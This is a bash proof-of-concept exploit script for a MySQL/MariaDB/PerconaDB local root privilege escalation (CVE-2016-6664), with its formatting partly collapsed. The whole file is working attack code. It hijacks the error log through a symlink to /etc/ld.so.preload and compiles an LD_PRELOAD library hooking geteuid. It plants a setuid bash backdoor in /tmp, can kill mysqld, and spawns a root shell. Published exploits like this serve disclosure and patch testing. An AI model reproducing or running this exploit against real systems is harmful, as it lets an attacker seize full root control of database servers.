#!/bin/bash -p## Source: https://legalhackers.com/advisories/MySQL-Maria-Percona-RootPrivEsc-CVE-2016-6664-5617-Exploit.html // http://legalhackers.com/exploits/CVE-2016-6664/mysql-chowned.sh## MySQL / MariaDB / PerconaDB - Root Privilege Escalation PoC Exploit# mysql-chowned.sh (ver. 1.0)## CVE-2016-6664 / OCVE-2016-5617## Discovered and coded by:## Dawid Golunski# dawid[at]legalhackers.com## https://legalhackers.com## Follow https://twitter.com/dawid_golunski for updates on this advisory.## This PoC exploit allows attackers to (instantly) escalate their privileges# from mysql system account to root through unsafe error log handling.# The exploit requires that file-based logging has been configured (default).# To confirm that syslog logging has not been enabled instead use:# grep -r syslog /etc/mysql# which should return no results.## This exploit can be chained with the following vulnerability:# CVE-2016-6663 / OCVE-2016-5616# which allows attackers to gain access to mysql system account (mysql shell).## In case database server has been configured with syslog you may also use:# CVE-2016-6662 as an alternative to this exploit.## Usage:# ./mysql-chowned.sh path_to_error.log ### See the full advisory for details at:# https://legalhackers.com/advisories/MySQL-Maria-Percona-RootPrivEsc-CVE-2016-6664-5617-Exploit.html## Video PoC:# https://legalhackers.com/videos/MySQL-MariaDB-PerconaDB-PrivEsc-Race-CVE-2016-6663-5616-6664-5617-Exploits.html### Disclaimer:# For testing purposes only. Do no harm.#BACKDOORSH="/bin/bash"BACKDOORPATH="/tmp/mysqlrootsh"PRIVESCLIB="/tmp/privesclib.so"PRIVESCSRC="/tmp/privesclib.c"SUIDBIN="/usr/bin/sudo"functioncleanexit{# Cleanup echo-e"\n[+] Cleaning up..."rm-f$PRIVESCSRCrm-f$PRIVESCLIBrm-f$ERRORLOGtouch$ERRORLOGif[-f /etc/ld.so.preload ];thenecho-n> /etc/ld.so.preload
fiecho-e"\n[+] Job done. Exiting with code $1\n"exit$1}functionctrl_c(){echo-e"\n[+] Active exploitation aborted. Remember you can use -deferred switch for deferred exploitation."
cleanexit 0}#intro echo-e"\033[94m \nMySQL / MariaDB / PerconaDB - Root Privilege Escalation PoC Exploit \nmysql-chowned.sh (ver. 1.0)\n\nCVE-2016-6664 / OCVE-2016-5617\n"echo-e"Discovered and coded by: \n\nDawid Golunski \nhttp://legalhackers.com \033[0m"# Argsif[$#-lt1];thenecho-e"\n[!] Exploit usage: \n\n$0 path_to_error.log \n"echo-e"It seems that this server uses: `ps aux |grep mysql |awk -F'log-error=''{ print $2 }'|cut -d' '-f1|grep'/'`\n"exit3fi# Priv checkecho-e"\n[+] Starting the exploit as \n\033[94m`id`\033[0m"id|grep-q mysql
if[$?-ne0];thenecho-e"\n[!] You need to execute the exploit as mysql user! Exiting.\n"exit3fi# Set target pathsERRORLOG="$1"if[!-f$ERRORLOG];thenecho-e"\n[!] The specified MySQL catalina.out log ($ERRORLOG) doesn't exist. Try again.\n"exit3fiecho-e"\n[+] Target MySQL log file set to $ERRORLOG"# [ Active exploitation ]trap ctrl_c INT
# Compile privesc preload libraryecho-e"\n[+] Compiling the privesc shared library ($PRIVESCSRC)"cat<<_solibeof_>$PRIVESCSRC#define _GNU_SOURCE#include <stdio.h>#include <sys/stat.h>#include <unistd.h>#include <dlfcn.h>#include <sys/types.h>#include <sys/stat.h>#include <fcntl.h>
uid_t geteuid(void){
static uid_t(*old_geteuid)();
old_geteuid = dlsym(RTLD_NEXT, "geteuid");if( old_geteuid()==0){
chown("$BACKDOORPATH", 0, 0);
chmod("$BACKDOORPATH", 04777);
//unlink("/etc/ld.so.preload");}return old_geteuid();}
_solibeof_
/bin/bash -c"gcc -Wall -fPIC -shared -o $PRIVESCLIB$PRIVESCSRC -ldl"if[$?-ne0];thenecho-e"\n[!] Failed to compile the privesc lib $PRIVESCSRC."
cleanexit 2;fi# Prepare backdoor shellcp$BACKDOORSH$BACKDOORPATHecho-e"\n[+] Backdoor/low-priv shell installed at: \n`ls-l $BACKDOORPATH`"# Safety checkif[-f /etc/ld.so.preload ];thenecho-e"\n[!] /etc/ld.so.preload already exists. Exiting for safety."exit2fi# Symlink the log file to /etcrm-f$ERRORLOG&&ln-s /etc/ld.so.preload $ERRORLOGif[$?-ne0];thenecho-e"\n[!] Couldn't remove the $ERRORLOG file or create a symlink."
cleanexit 3fiecho-e"\n[+] Symlink created at: \n`ls-l $ERRORLOG`"# Wait for MySQL to re-open the logsecho-ne"\n[+] Waiting for MySQL to re-open the logs/MySQL service restart...\n"read-p"Do you want to kill mysqld process to instantly get root? :) ? [y/n] " THE_ANSWER
if["$THE_ANSWER"="y"];thenecho-e"Got it. Executing 'killall mysqld' now..."killall mysqld
fiwhile:;dosleep0.1if[-f /etc/ld.so.preload ];thenecho$PRIVESCLIB> /etc/ld.so.preload
rm-f$ERRORLOGbreak;fidone# /etc/ dir should be owned by mysql user at this point# Inject the privesc.so shared library to escalate privilegesecho$PRIVESCLIB> /etc/ld.so.preload
echo-e"\n[+] MySQL restarted. The /etc/ld.so.preload file got created with mysql privileges: \n`ls-l /etc/ld.so.preload`"echo-e"\n[+] Adding $PRIVESCLIB shared lib to /etc/ld.so.preload"echo-e"\n[+] The /etc/ld.so.preload file now contains: \n`cat /etc/ld.so.preload`"chmod755 /etc/ld.so.preload
# Escalating privileges via the SUID binary (e.g. /usr/bin/sudo)echo-e"\n[+] Escalating privileges via the $SUIDBIN SUID binary to get root!"sudo2>/dev/null >/dev/null
#while :; do # sleep 0.1# ps aux | grep mysqld | grep -q 'log-error'# if [ $? -eq 0 ]; then# break;# fi#done# Check for the rootshellls-l$BACKDOORPATHls-l$BACKDOORPATH|grep rws |grep-q root
if[$?-eq0];thenecho-e"\n[+] Rootshell got assigned root SUID perms at: \n`ls-l $BACKDOORPATH`"echo-e"\n\033[94mGot root! The database server has been ch-OWNED !\033[0m"elseecho-e"\n[!] Failed to get root"
cleanexit 2fi# Execute the rootshellecho-e"\n[+] Spawning the rootshell $BACKDOORPATH now! \n"$BACKDOORPATH-p-c"rm -f /etc/ld.so.preload; rm -f $PRIVESCLIB"$BACKDOORPATH-p# Job done.
cleanexit 0
